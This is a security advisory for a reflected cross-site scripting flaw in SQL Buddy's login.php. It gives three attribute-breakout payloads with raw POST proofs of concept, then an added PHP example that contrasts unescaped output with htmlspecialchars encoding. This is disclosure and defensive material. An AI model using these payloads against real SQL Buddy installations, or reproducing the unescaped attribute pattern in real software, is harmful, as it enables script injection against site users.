Sqlbuddy versions 1.3.2 and 1.3.3 suffer from a reflected cross-site scripting vulnerability.
##################################################################################################
#
#Exploit Title : Sqlbuddy 1.3.2 & 1.3.3 Reflected Cross-Site Scripting
#Author : Govind Singh aka NullPort
#Vendor : http://sqlbuddy.com/
#Download Link : https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip (Sqlbuddy 1.3.3)
#Date : 14/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to : All IHT Members
#
###################################################################################################
About vendor :
SQL Buddy is an open source web based application written in PHP intended to handle the administration of MySQL and SQLite with the use of a Web browser.
The project places an emphasis on ease of installation and a simple user interface.
Cross-Site Scripting vulnerability in the "login.php" page via the parameters "DATABASE", "HOST" & "USER"
=========== ===========================
HOST Payload : localhost" onmouseover=prompt(955794) bad="
PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=101
POSTDATA=ADAPTER=mysql&HOST=01/01/1967%22%20onmouseover%3dprompt(906831)%20bad%3d%22&USER=root&PASS=&DATABASE=
-----------------------------------------------------------------------------------------------------------------
USER payload : root" onmouseover=prompt(959474) bad="
PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=93
POSTDATA=ADAPTER=mysql&HOST=01%2F01%2F1967&USER=root" onmouseover=prompt(959474) bad="&PASS=&DATABASE=
----------------------------------------------------------------------------------------------------------------------
DATABASE payload : 01/01/1967" onmouseover=prompt(906831) bad="
PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=98
POSTDATA=ADAPTER=mysql&HOST=localhost&USER=root&PASS=&DATABASE=01/01/1967" onmouseover=prompt(906831) bad="
------------------------------------------------------------------------------------------------------------------
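Why the three payloads above take effect, and the output encoding that stops them, as an added example that is not part of the original advisory and is not SQL Buddy's own code. It assumes login.php re-displays the submitted HOST, USER and DATABASE values inside double-quoted value attributes; the function names are hypothetical.

```php
<?php
// Added example. Function names are hypothetical; this is not SQL Buddy source.
// Assumption: the login form echoes submitted values into value="..." attributes.

// Unsafe: the value is concatenated into a double-quoted attribute as-is.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Safe: encode for the attribute context. ENT_QUOTES encodes both " and ',
// ENT_SUBSTITUTE keeps invalid UTF-8 from turning the output into "".
function render_field_safe(string $name, string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $encoded . '">';
}

// List the attributes an HTML parser sees on the rendered <input>.
function attribute_names(string $html): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Values taken from the advisory's payload lines.
$submitted = [
    'HOST'     => 'localhost" onmouseover=prompt(955794) bad="',
    'USER'     => 'root" onmouseover=prompt(959474) bad="',
    'DATABASE' => '01/01/1967" onmouseover=prompt(906831) bad="',
];

foreach ($submitted as $field => $value) {
    $unsafe = attribute_names(render_field_unsafe($field, $value));
    $safe   = attribute_names(render_field_safe($field, $value));
    printf("%-8s unsafe: %s\n", $field, implode(', ', $unsafe));
    printf("%-8s safe:   %s\n", $field, implode(', ', $safe));
}
```

An event-handler attribute appearing in the unsafe list is the condition a regression test for login.php should fail on; with the encoded form the submitted text stays inside value.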